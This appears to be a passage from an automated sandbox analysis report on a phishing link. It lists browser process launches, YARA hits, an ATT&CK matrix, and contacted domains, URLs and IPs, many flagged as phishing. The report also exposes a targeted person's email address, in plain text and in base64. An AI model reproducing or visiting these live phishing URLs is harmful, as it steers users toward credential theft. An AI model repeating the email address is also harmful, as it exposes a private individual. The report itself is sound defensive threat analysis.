              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1864,i,9605611163872503746,10620758369613315957,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1540 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ=="
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1864,i,9605611163872503746,10620758369613315957,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1540 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 2.2.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.13..script.csv, type: HTML
              Source: Yara matchFile source: 3.14..script.csv, type: HTML
              Source: Yara matchFile source: 3.6.pages.csv, type: HTML
              Source: Yara matchFile source: 3.5.pages.csv, type: HTML
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.8.pages.csv, type: HTML
              Source: Yara matchFile source: 3.7.pages.csv, type: HTML
              Source: Yara matchFile source: 3.10.pages.csv, type: HTML

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid AccountsWindows Management Instrumentation2
              Browser Extensions              		1
              Process Injection              		12
              Masquerading              		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting              		1
              Extra Window Memory Injection              		1
              Process Injection              		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion              		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Extra Window Memory Injection              		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Screenshots

              Download Video

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==0%Avira URL Cloudsafe

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://csnrda.net/un-plugins/0%Avira URL Cloudsafe
              https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.com100%Avira URL Cloudphishing
              https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j0%Avira URL Cloudsafe
              https://y0x6.tjsqawfetli.es/favicon.ico100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/346fndDfLt88Ww23abbZTGRt6720100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/GDSherpa-bold.woff2100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/34iyqRIj4uqUbeg5dCF2ghaihKiMc5js7oxkB67110100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/yzyL39APlvjnlq1ppBWtnJYuv3Nymnp6erd3vFeg2V9rHBEqL4690179100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/zcE2QLrz0cz39kxUr8OYVGulcrWHmTKZ5rZwfw100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/mx5ja6d20FTRDDd2WxrmtuhjDo5d100%Avira URL Cloudphishing
              https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=6367236304889408250%Avira URL Cloudsafe
              https://y0x6.tjsqawfetli.es/ef7Ix5bMCWZ8fN6mjluRrrPLIbOzElXijXDPs7OuLhBG890145100%Avira URL Cloudphishing
              https://7j87.nmpjkg.ru/machlo$a0iuc80%Avira URL Cloudsafe
              https://y0x6.tjsqawfetli.es/wxdC57pVq7OFKAZ3ckUst5gc4IjmY47Il0FITRSk34130100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/hxkiCCfJLo900zRSkQ6C8BeFyMy8WtsetRziWWoR44Ji50IdGyaFWzS7dCnb100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/klBcnDvaiorUutbh5B3Adjn4Q5P6J55tBLVCjJ9xNFE56CgQsKJMuRo2uconQpvHSdX2RE5pEuv214100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/abv5IA8EJpq3Qcgh23100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/opHEkFr4q1WYO5T8k73FNznYcuhCiUef12JKL94q3dnBi6rN67131100%Avira URL Cloudphishing
              https://addins.verityrms.com/assets/icon-80.png0%Avira URL Cloudsafe
              https://y0x6.tjsqawfetli.es/ijq0GXuThn3eYSabiYAx9qo9lB6ksy0fMmudSZKutxyUkYF0XxMNi130dfxbM4xef210100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/kl4lB5NwdKx55JKSBrT1syOqZ5AE2wi6lKKLXcdqmKvsRgFbLliPAdS7m78168100%Avira URL Cloudphishing
              https://wireframepro.mockflow.com/integrations/office365/images/icon-80.png0%Avira URL Cloudsafe
              https://app.mockflow.com/integrations/office365/images/icon-80.png0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=ScnU%2Bmd9%2FyqFY8wwY3dlrkFZNsxajPsgraupLPpBGC0w7o%2BXouBA5msxApfEnAgBMXQN5TGFkWHwHbn4Ef6SNUH94zQcA%2BK3VpgrnODH001n4n4BvkutG22jsQDv0%Avira URL Cloudsafe
              https://y0x6.tjsqawfetli.es/GDSherpa-vf2.woff2100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/GDSherpa-vf.woff2100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/GDSherpa-regular.woff100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/opDKN2QliBSAjkfGHHCvfE9bIDoWuqGqXD12ZVJwljwbfR0D65xwnlt20ekckBZU8kgTjcd238100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/rse78Bu8wNVAGneDhXNWxmUQtGFEK55nghvksAYgzKamMRP8E6ZZ6UnZ9Zte71VOef200100%Avira URL Cloudphishing
              https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=6367235678360612410%Avira URL Cloudsafe
              https://www.ivo-security.blog/wp-content/uploads/2021/01/MS-Security.png0%Avira URL Cloudsafe
              https://y0x6.tjsqawfetli.es/GDSherpa-bold.woff100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/GDSherpa-regular.woff2100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/stQkM4Uk4MddyBfBYuWKxUiORNFVu3l67OFUF9h0Utq8kgczgm10O7gzhdgaHwUyVggh251100%Avira URL Cloudphishing
              https://y0x6.tjsqawfetli.es/kl6EM2sFTprk4bUXtznm4INqmZtayxEMabyOlGpv3089VNZki7P5sID5CIzlx5KFZ5Wd8zmEVPvab225100%Avira URL Cloudphishing
              https://a.nel.cloudflare.com/report/v4?s=fPu%2BHjVkdhhBlYjpzD7qkeprO5zLEA%2BBNM4BIc6NCCL2hV3j936q6zQTUtzWFqCG18wQEJTrFFOFq5oI0jgEvj%2FnK0JqdKlKF%2FDUzQxNsnjGlxuhbQuo4LrimOK20%Avira URL Cloudsafe
              https://www.bestbuy.com/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              g1vwicriviownz85jhmnyjeprlqjjem9vcgtgvdudgzx0wizff.xpwqud.ru
              		172.67.207.40
              		truefalse
                		unknown
                developers.cloudflare.com
                		104.16.2.189
                		truefalse
                  		high
                  beacons-handoff.gcp.gvt2.com
                  		142.250.114.94
                  		truefalse
                    		high
                    main-balancer-1167032311.us-east-1.elb.amazonaws.com
                    		44.208.218.209
                    		truefalse
                      		unknown
                      www.tm.a.prd.aadg.trafficmanager.net
                      		20.190.190.196
                      		truefalse
                        		high
                        ogads-pa.clients6.google.com
                        		142.251.40.170
                        		truefalse
                          		high
                          code.jquery.com
                          		151.101.2.137
                          		truefalse
                            		high
                            cdnjs.cloudflare.com
                            		104.17.24.14
                            		truefalse
                              		high
                              a726.dscd.akamai.net
                              		23.40.179.142
                              		truefalse
                                		high
                                www.google.com
                                		142.251.32.100
                                		truefalse
                                  		high
                                  e5816.x.akamaiedge.net
                                  		23.48.144.218
                                  		truefalse
                                    		high
                                    www.ivo-security.blog
                                    		94.124.122.16
                                    		truefalse
                                      		high
                                      csnrda.net
                                      		69.49.246.124
                                      		truetrue
                                        		unknown
                                        s-part-0012.t-0009.t-msedge.net
                                        		13.107.246.40
                                        		truefalse
                                          		high
                                          wireframepro.mockflow.com
                                          		3.33.248.19
                                          		truefalse
                                            		high
                                            a.nel.cloudflare.com
                                            		35.190.80.1
                                            		truefalse
                                              		high
                                              e329293.dscd.akamaiedge.net
                                              		23.209.72.31
                                              		truefalse
                                                		high
                                                plus.l.google.com
                                                		142.250.65.238
                                                		truefalse
                                                  		high
                                                  github.com
                                                  		140.82.113.4
                                                  		truefalse
                                                    		high
                                                    beacons2.gvt2.com
                                                    		172.217.170.195
                                                    		truefalse
                                                      		high
                                                      beacons.gvt2.com
                                                      		142.250.65.195
                                                      		truefalse
                                                        		high
                                                        7j87.nmpjkg.ru
                                                        		104.21.80.1
                                                        		truefalse
                                                          		unknown
                                                          app.mockflow.com
                                                          		99.83.148.19
                                                          		truefalse
                                                            		unknown
                                                            play.google.com
                                                            		142.251.40.174
                                                            		truefalse
                                                              		high
                                                              y0x6.tjsqawfetli.es
                                                              		172.67.221.135
                                                              		truetrue
                                                                		unknown
                                                                get.geojs.io
                                                                		172.67.70.233
                                                                		truefalse
                                                                  		high
                                                                  d19d360lklgih4.cloudfront.net
                                                                  		18.164.124.91
                                                                  		truefalse
                                                                    		high
                                                                    objects.githubusercontent.com
                                                                    		185.199.111.133
                                                                    		truefalse
                                                                      		high
                                                                      beacons.gcp.gvt2.com
                                                                      		unknown
                                                                      		unknownfalse
                                                                        		high
                                                                        aadcdn.msauthimages.net
                                                                        		unknown
                                                                        		unknownfalse
                                                                          		high
                                                                          www.bestbuy.com
                                                                          		unknown
                                                                          		unknownfalse
                                                                            		high
                                                                            addins.verityrms.com
                                                                            		unknown
                                                                            		unknownfalse
                                                                              		high
                                                                              ok4static.oktacdn.com
                                                                              		unknown
                                                                              		unknownfalse
                                                                                		high
                                                                                login.microsoftonline.com
                                                                                		unknown
                                                                                		unknownfalse
                                                                                  		high
                                                                                  apis.google.com
                                                                                  		unknown
                                                                                  		unknownfalse
                                                                                    		high

                                                                                    Contacted URLs

                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                    https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                                                      		high
                                                                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                                                        		high
                                                                                        https://y0x6.tjsqawfetli.es/GDSherpa-bold.woff2true
                                                                                        • Avira URL Cloud: phishing
                                                                                        		unknown
                                                                                        https://y0x6.tjsqawfetli.es/favicon.icotrue
                                                                                        • Avira URL Cloud: phishing
                                                                                        		unknown
                                                                                        https://7j87.nmpjkg.ru/machlo$a0iuc8false
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://y0x6.tjsqawfetli.es/mx5ja6d20FTRDDd2WxrmtuhjDo5dtrue
                                                                                        • Avira URL Cloud: phishing
                                                                                        		unknown
                                                                                        https://y0x6.tjsqawfetli.es/wxdC57pVq7OFKAZ3ckUst5gc4IjmY47Il0FITRSk34130true
                                                                                        • Avira URL Cloud: phishing
                                                                                        		unknown
                                                                                        https://y0x6.tjsqawfetli.es/hxkiCCfJLo900zRSkQ6C8BeFyMy8WtsetRziWWoR44Ji50IdGyaFWzS7dCnbtrue
                                                                                        • Avira URL Cloud: phishing
                                                                                        		unknown
                                                                                        https://app.mockflow.com/integrations/office365/images/icon-80.pngfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://wireframepro.mockflow.com/integrations/office365/images/icon-80.pngfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                                                          		high
                                                                                          https://y0x6.tjsqawfetli.es/opHEkFr4q1WYO5T8k73FNznYcuhCiUef12JKL94q3dnBi6rN67131true
                                                                                          • Avira URL Cloud: phishing
                                                                                          		unknown
                                                                                          https://y0x6.tjsqawfetli.es/kl4lB5NwdKx55JKSBrT1syOqZ5AE2wi6lKKLXcdqmKvsRgFbLliPAdS7m78168true
                                                                                          • Avira URL Cloud: phishing
                                                                                          		unknown
                                                                                          https://addins.verityrms.com/assets/icon-80.pngfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://a.nel.cloudflare.com/report/v4?s=ScnU%2Bmd9%2FyqFY8wwY3dlrkFZNsxajPsgraupLPpBGC0w7o%2BXouBA5msxApfEnAgBMXQN5TGFkWHwHbn4Ef6SNUH94zQcA%2BK3VpgrnODH001n4n4BvkutG22jsQDvfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://y0x6.tjsqawfetli.es/GDSherpa-vf.woff2true
                                                                                          • Avira URL Cloud: phishing
                                                                                          		unknown
                                                                                          https://login.microsoftonline.com/common/SAS/ProcessAuthfalse
                                                                                            		unknown
                                                                                            https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=636723567836061241false
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                                                              		high
                                                                                              https://y0x6.tjsqawfetli.es/rse78Bu8wNVAGneDhXNWxmUQtGFEK55nghvksAYgzKamMRP8E6ZZ6UnZ9Zte71VOef200true
                                                                                              • Avira URL Cloud: phishing
                                                                                              		unknown
                                                                                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                                                                		high
                                                                                                https://y0x6.tjsqawfetli.es/GDSherpa-regular.woff2true
                                                                                                • Avira URL Cloud: phishing
                                                                                                		unknown
                                                                                                https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.comtrue
                                                                                                • Avira URL Cloud: phishing
                                                                                                		unknown
                                                                                                https://y0x6.tjsqawfetli.es/stQkM4Uk4MddyBfBYuWKxUiORNFVu3l67OFUF9h0Utq8kgczgm10O7gzhdgaHwUyVggh251true
                                                                                                • Avira URL Cloud: phishing
                                                                                                		unknown
                                                                                                https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=636723630488940825false
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://y0x6.tjsqawfetli.es/34iyqRIj4uqUbeg5dCF2ghaihKiMc5js7oxkB67110true
                                                                                                • Avira URL Cloud: phishing
                                                                                                		unknown
                                                                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                                  		high
                                                                                                  https://y0x6.tjsqawfetli.es/346fndDfLt88Ww23abbZTGRt6720true
                                                                                                  • Avira URL Cloud: phishing
                                                                                                  		unknown
                                                                                                  https://y0x6.tjsqawfetli.es/ef7Ix5bMCWZ8fN6mjluRrrPLIbOzElXijXDPs7OuLhBG890145true
                                                                                                  • Avira URL Cloud: phishing
                                                                                                  		unknown
                                                                                                  https://csnrda.net/un-plugins/true
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                                                                    		high
                                                                                                    https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==false
                                                                                                      		unknown
                                                                                                      https://y0x6.tjsqawfetli.es/zcE2QLrz0cz39kxUr8OYVGulcrWHmTKZ5rZwfwtrue
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      		unknown
                                                                                                      https://y0x6.tjsqawfetli.es/kl6EM2sFTprk4bUXtznm4INqmZtayxEMabyOlGpv3089VNZki7P5sID5CIzlx5KFZ5Wd8zmEVPvab225true
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      		unknown
                                                                                                      https://www.bestbuy.com/false
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://y0x6.tjsqawfetli.es/yzyL39APlvjnlq1ppBWtnJYuv3Nymnp6erd3vFeg2V9rHBEqL4690179true
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      		unknown
                                                                                                      https://www.google.com/async/newtab_promosfalse
                                                                                                        		high
                                                                                                        https://y0x6.tjsqawfetli.es/klBcnDvaiorUutbh5B3Adjn4Q5P6J55tBLVCjJ9xNFE56CgQsKJMuRo2uconQpvHSdX2RE5pEuv214true
                                                                                                        • Avira URL Cloud: phishing
                                                                                                        		unknown
                                                                                                        https://y0x6.tjsqawfetli.es/abv5IA8EJpq3Qcgh23true
                                                                                                        • Avira URL Cloud: phishing
                                                                                                        		unknown
                                                                                                        https://a.nel.cloudflare.com/report/v4?s=fPu%2BHjVkdhhBlYjpzD7qkeprO5zLEA%2BBNM4BIc6NCCL2hV3j936q6zQTUtzWFqCG18wQEJTrFFOFq5oI0jgEvj%2FnK0JqdKlKF%2FDUzQxNsnjGlxuhbQuo4LrimOK2false
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.google.com/async/ddljson?async=ntp:2false
                                                                                                          		high
                                                                                                          https://play.google.com/log?format=json&hasfast=truefalse
                                                                                                            		high
                                                                                                            https://y0x6.tjsqawfetli.es/ijq0GXuThn3eYSabiYAx9qo9lB6ksy0fMmudSZKutxyUkYF0XxMNi130dfxbM4xef210true
                                                                                                            • Avira URL Cloud: phishing
                                                                                                            		unknown
                                                                                                            https://developers.cloudflare.com/favicon.pngfalse
                                                                                                              		high
                                                                                                              https://y0x6.tjsqawfetli.es/GDSherpa-vf2.woff2true
                                                                                                              • Avira URL Cloud: phishing
                                                                                                              		unknown
                                                                                                              https://y0x6.tjsqawfetli.es/GDSherpa-regular.wofftrue
                                                                                                              • Avira URL Cloud: phishing
                                                                                                              		unknown
                                                                                                              https://www.ivo-security.blog/wp-content/uploads/2021/01/MS-Security.pngfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3jfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9vR1rNwOjC3PXOxUlyKiCwNBv2Fg/cb=gapi.loaded_0false
                                                                                                                		high
                                                                                                                https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLtrue
                                                                                                                  		unknown
                                                                                                                  https://get.geojs.io/v1/ip/geo.jsonfalse
                                                                                                                    		high
                                                                                                                    https://y0x6.tjsqawfetli.es/opDKN2QliBSAjkfGHHCvfE9bIDoWuqGqXD12ZVJwljwbfR0D65xwnlt20ekckBZU8kgTjcd238true
                                                                                                                    • Avira URL Cloud: phishing
                                                                                                                    		unknown
                                                                                                                    https://y0x6.tjsqawfetli.es/GDSherpa-bold.wofftrue
                                                                                                                    • Avira URL Cloud: phishing
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    104.21.48.1
                                                                                                                    		unknownUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    140.82.113.4
                                                                                                                    		github.comUnited States
                                                                                                                    		36459GITHUBUSfalse
                                                                                                                    23.40.179.142
                                                                                                                    		a726.dscd.akamai.netUnited States
                                                                                                                    		16625AKAMAI-ASUSfalse
                                                                                                                    13.107.246.40
                                                                                                                    		s-part-0012.t-0009.t-msedge.netUnited States
                                                                                                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    52.223.47.116
                                                                                                                    		unknownUnited States
                                                                                                                    		8987AMAZONEXPANSIONGBfalse
                                                                                                                    20.189.173.8
                                                                                                                    		unknownUnited States
                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    94.124.122.16
                                                                                                                    		www.ivo-security.blogNetherlands
                                                                                                                    		25459NEDZONE-ASNLfalse
                                                                                                                    104.21.80.1
                                                                                                                    		7j87.nmpjkg.ruUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    185.199.111.133
                                                                                                                    		objects.githubusercontent.comNetherlands
                                                                                                                    		54113FASTLYUSfalse
                                                                                                                    142.251.40.131
                                                                                                                    		unknownUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    142.250.65.238
                                                                                                                    		plus.l.google.comUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    23.48.144.218
                                                                                                                    		e5816.x.akamaiedge.netUnited States
                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                    3.33.248.19
                                                                                                                    		wireframepro.mockflow.comUnited States
                                                                                                                    		8987AMAZONEXPANSIONGBfalse
                                                                                                                    142.251.32.100
                                                                                                                    		www.google.comUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    172.67.221.135
                                                                                                                    		y0x6.tjsqawfetli.esUnited States
                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                    54.161.239.131
                                                                                                                    		unknownUnited States
                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                    142.251.40.174
                                                                                                                    		play.google.comUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    172.64.80.1
                                                                                                                    		unknownUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    35.190.80.1
                                                                                                                    		a.nel.cloudflare.comUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    23.209.72.31
                                                                                                                    		e329293.dscd.akamaiedge.netUnited States
                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                    20.190.190.196
                                                                                                                    		www.tm.a.prd.aadg.trafficmanager.netUnited States
                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    142.251.40.170
                                                                                                                    		ogads-pa.clients6.google.comUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    104.16.2.189
                                                                                                                    		developers.cloudflare.comUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    23.209.72.34
                                                                                                                    		unknownUnited States
                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                    142.250.65.234
                                                                                                                    		unknownUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    23.40.179.151
                                                                                                                    		unknownUnited States
                                                                                                                    		16625AKAMAI-ASUSfalse
                                                                                                                    104.17.24.14
                                                                                                                    		cdnjs.cloudflare.comUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    18.164.124.91
                                                                                                                    		d19d360lklgih4.cloudfront.netUnited States
                                                                                                                    		3MIT-GATEWAYSUSfalse
                                                                                                                    142.251.179.84
                                                                                                                    		unknownUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    172.67.207.40
                                                                                                                    		g1vwicriviownz85jhmnyjeprlqjjem9vcgtgvdudgzx0wizff.xpwqud.ruUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    151.101.2.137
                                                                                                                    		code.jquery.comUnited States
                                                                                                                    		54113FASTLYUSfalse
                                                                                                                    44.208.218.209
                                                                                                                    		main-balancer-1167032311.us-east-1.elb.amazonaws.comUnited States
                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                    18.164.124.110
                                                                                                                    		unknownUnited States
                                                                                                                    		3MIT-GATEWAYSUSfalse
                                                                                                                    69.49.246.124
                                                                                                                    		csnrda.netUnited States
                                                                                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                    142.251.32.110
                                                                                                                    		unknownUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    99.83.148.19
